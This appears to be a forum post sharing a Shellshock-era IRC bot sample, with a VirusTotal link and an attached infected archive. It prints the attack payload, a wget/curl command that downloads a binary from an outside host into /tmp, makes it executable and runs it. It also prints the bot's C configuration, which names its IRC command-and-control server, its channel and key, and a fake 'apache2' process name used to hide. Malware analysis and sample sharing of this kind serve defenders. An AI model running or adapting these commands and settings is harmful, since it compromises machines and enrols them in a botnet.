More: https://www.virustotal.com/en/file/3caf ... 411856827/
#CNC: linksys,secureshellz,net Channel IRC = "#shellshock" < PoC of a designed for ShellShock event
Source: #shellshock attack payloads:
#CNC: linksys,secureshellz,net Channel IRC = "#shellshock" < PoC of a designed for ShellShock event
Source: #shellshock attack payloads:
Code: Select all
IRC server:
wget http://stablehost.us/bots/a -O /tmp/a;
curl -o /tmp/a http://stablehost.us/bots/a;
chmod +x /tmp/a;
/tmp/a;
Code: Select all
#undef STARTUP // Start on startup?
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "apache2" // What you want this to hide as
#define CHAN "#shellshock" // Channel to join
#define KEY "bleh" // The key of the channel
int numservers=1; // Must change this to equal number of servers down there
char *servers[] = { // List the servers in that format, always end in (void*)0
"linksys.secureshellz.net",
(void*)0
};
Attachments
7z/infected
(319.96 KiB) Downloaded 73 times
(319.96 KiB) Downloaded 73 times